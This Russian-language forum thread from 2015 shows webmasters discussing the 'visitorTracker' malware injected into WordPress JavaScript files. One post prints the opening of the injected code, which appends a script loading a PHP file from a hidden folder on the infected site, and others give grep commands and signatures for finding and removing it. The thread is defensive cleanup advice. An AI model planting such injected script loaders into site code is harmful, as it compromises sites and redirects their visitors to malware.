X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> "Дыра" в Wordpress
mmkulikov
mmkulikov
Topic Starter сообщение 29.9.2015, 13:56; Ответить: mmkulikov
Сообщение #1


Старожил
******

Группа: Active User
Сообщений: 2023
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 587 раз
Репутация:   68  


Эпидемия новой заразы на сайтах под управлением WordPress (включая самую последнюю)
Вот подробно о заразе
П.С.
Сегодня пол дня "коту под хвост" - сидел выковыривал эту погань на некоторых своих сайтах.
Нашел не на всех, но проверить пришлось все... :zloy:


--------------------


Поблагодарили: (3)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vreg
Vreg
сообщение 29.9.2015, 13:58; Ответить: Vreg
Сообщение #2


3,14159265358979323846264
******

Группа: Super Moderator
Сообщений: 1269
Регистрация: 28.12.2011
Из: Курган
Поблагодарили: 1388 раз
Репутация:   193  


Каким образом проверяли?


--------------------
Написание и размножение статей - всегда рад помочь.
место сдается - писать в ЛС;
место сдается - писать в ЛС;
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
Topic Starter сообщение 29.9.2015, 14:08; Ответить: mmkulikov
Сообщение #3


Старожил
******

Группа: Active User
Сообщений: 2023
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 587 раз
Репутация:   68  


Цитата(Vreg @ 29.9.2015, 11:58) *
Каким образом проверяли?

Для начала получил "письмо счастья" от гугла, а потом все сайты руками
Находится легко, благо не шифруется
Вот пример начала зараженного файла js
Код
/*visitorTracker*/
var visitortrackerin = setInterval(function(){
    if(document.body != null && typeof document.body != "undefined"){
        clearInterval(visitortrackerin);
        if(typeof window["globalvisitor"] == "undefined"){
            window["globalvisitor"] = 1;
            var isIE = visitortrackerde();
            var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
              if(visitorTracker_isMob()){
              var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://здесь_потер_урл_своего_сайта/wp-includes/SimplePie/Content/Type/main_configs/tracks.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
            }else{

Удаляем все найденные куски (они все только в начале файла) между /*visitorTracker*/код_трояна/*visitorTracker*/
Ну и папку с файлом (может распологаться по разному и называться по разному)
В данном примере это wp-includes/SimplePie/Content/Type/main_configs/tracks.php
Где-то так-с :pionertrava:


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Вентилятор
Вентилятор
сообщение 29.9.2015, 14:20; Ответить: Вентилятор
Сообщение #4


покупаю хорошие проекты
******

Группа: Active User
Сообщений: 1801
Регистрация: 8.8.2010
Поблагодарили: 601 раз
Репутация:   106  


Цитата(mmkulikov @ 29.9.2015, 12:56) *
Вот подробно о заразе


"Исследователи пишут, что сейчас малварь отсылает пользователей на vovagandon.tk (193.169.244.159)"


)))


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
x64
x64
сообщение 29.9.2015, 16:08; Ответить: x64
Сообщение #5


F.A.L.L.O.U.T.
*******

Группа: Super Moderator
Сообщений: 3425
Регистрация: 30.6.2011
Из: Железнодорожный (Балашиха)
Поблагодарили: 2747 раз
Репутация:   289  


Поискать файлы можно так: коннектимся по SSH и выполняем команду:
Код
find /путь/к/сайтам/ -name '*.php' | xargs -n1 grep -rlF 'VisitorTracker'



--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 29.9.2015, 17:11; Ответить: kagtus
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 416
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


ТС, из какой фразы статьи вытекает, что
Цитата
на сайтах под управлением WordPress (включая самую последнюю)

???

Сообщение отредактировал kagtus - 29.9.2015, 17:12


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
siteSgun
siteSgun
сообщение 30.9.2015, 2:33; Ответить: siteSgun
Сообщение #7


Частый гость
**

Группа: User
Сообщений: 59
Регистрация: 9.9.2015
Поблагодарили: 13 раз
Репутация:   2  


Цитата(mmkulikov @ 29.9.2015, 13:56) *
Эпидемия новой заразы на сайтах под управлением WordPress (включая самую последнюю)

Как раз самые последние версии, чаще всего, и подвержены подобным "налетам". Шанс найти уязвимость и широкое распространение не оставляет шансов остаться без внимания у хакеров.

Есть же стабильные предыдущие релизы, зачем каждый раз торопиться с обновлениями?..
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
Topic Starter сообщение 30.9.2015, 11:55; Ответить: mmkulikov
Сообщение #8


Старожил
******

Группа: Active User
Сообщений: 2023
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 587 раз
Репутация:   68  


Цитата(x64 @ 29.9.2015, 14:08) *
find /путь/к/сайтам/ -name '*.php' | xargs -n1 grep -rlF 'VisitorTracker'

Сегодня обнаружил "клон" этой заразы с уже другой сигнатурой /*161557fbea2c302f309892cd115a35aa*/
Вот же га... :censored:

P.S.
Кстати - ошибочка ) Не *.php надо, а *.js
Эта дрянь "живет" в js скриптах

Сообщение отредактировал mmkulikov - 30.9.2015, 11:57


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
x64
x64
сообщение 30.9.2015, 12:03; Ответить: x64
Сообщение #9


F.A.L.L.O.U.T.
*******

Группа: Super Moderator
Сообщений: 3425
Регистрация: 30.6.2011
Из: Железнодорожный (Балашиха)
Поблагодарили: 2747 раз
Репутация:   289  


Цитата(mmkulikov @ 30.9.2015, 10:55) *
Кстати - ошибочка ) Не *.php надо, а *.js

Да хоть по всем файлам, но это ж долго, если что-то тяжёлое есть :)
Код
'*.php' → '*'


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
Topic Starter сообщение 30.9.2015, 12:18; Ответить: mmkulikov
Сообщение #10


Старожил
******

Группа: Active User
Сообщений: 2023
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 587 раз
Репутация:   68  


Цитата(x64 @ 30.9.2015, 10:03) *
Да хоть по всем файлам, но это ж долго

У меня "сидело" и в "безликих" tetqwqsad0ehSvo и т.п. (около 3000 файлов)
И 'VisitorTracker' уже не панацея :hmhm:
Благо "стиль" заражения пока остался. Ключевое сло здесь наверное "пока" :_censored:


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
15 Nell 1139 13.12.2017, 23:36
автор: Nell
Открытая тема (нет новых ответов) Новости mail.ru появятся в "рекомендациях" Вконтакте?
19 eduarddis 2780 12.12.2017, 20:37
автор: galikfor
Горячая тема (нет новых ответов) Вёрстка, натяжка на WordPress, Joomla, качественно, доступно
53 WhiteIce 23770 12.12.2017, 19:41
автор: WhiteIce
Горячая тема (нет новых ответов) Разработка сайтов Joomla Wordpress Opencart
Разработка, верстка, оптимизация веб сайтов.
48 WoWeb 7346 12.12.2017, 13:37
автор: serg5777
Открытая тема (нет новых ответов) Имеет ли смысл такое "присоединение сайтов"?
перенести все статьи на свой сайт, а с прежнего поставить 301 редирект
9 coremission 1085 11.12.2017, 16:32
автор: One_on_One


 



RSS Текстовая версия Сейчас: 15.12.2017, 3:22
Дизайн